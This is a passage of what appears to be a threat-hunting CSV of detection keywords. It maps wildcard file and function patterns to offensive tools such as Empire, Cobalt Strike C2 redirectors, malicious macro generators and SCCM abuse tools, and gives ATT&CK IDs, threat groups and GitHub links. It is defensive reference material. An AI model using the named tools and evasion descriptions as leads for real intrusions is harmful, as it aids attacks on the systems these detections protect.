TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_anonymous_login_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_echo_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_free_hole_session_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_nt_trans_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_trans2_explo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb2_payload_body_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb2_payload_headers_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*makebof.bat*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*MakeHTTPSmugglerJAR.launch*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation 
tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" +"*malicious.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*malicious.dll*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*MaliciousMacroGenerator*","offensive_tool_keyword","MaliciousMacroGenerator","Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.","T1027 - T1564 - T1127 - T1059 - T1562","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator","1","0","N/A","N/A","9","808","210","2019-04-17T19:47:38Z","2016-09-21T23:18:14Z" +"*MaliciousMacroMSBuild-master*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"*Malleable C2 Files*","offensive_tool_keyword","cobaltstrike","Cobaltstrike 
toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*Malleable PE/Stage*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*malleable_redirector.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*malleable_redirector_hidden_api_endpoint*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*Malleable-C2-Profiles*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Malleable-C2-Randomizer*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*Malleable-C2-Randomizer*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced 
adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*malleable-c2-randomizer.py*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*MalleableProfileB64*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" 
+"*MalleableProfiles.vue*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" +"*malleable-redirector-config*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*MalSCCM.exe*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*MalSCCM-main*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*malware.NewConfig*","offensive_tool_keyword","KittyStager","KittyStager 
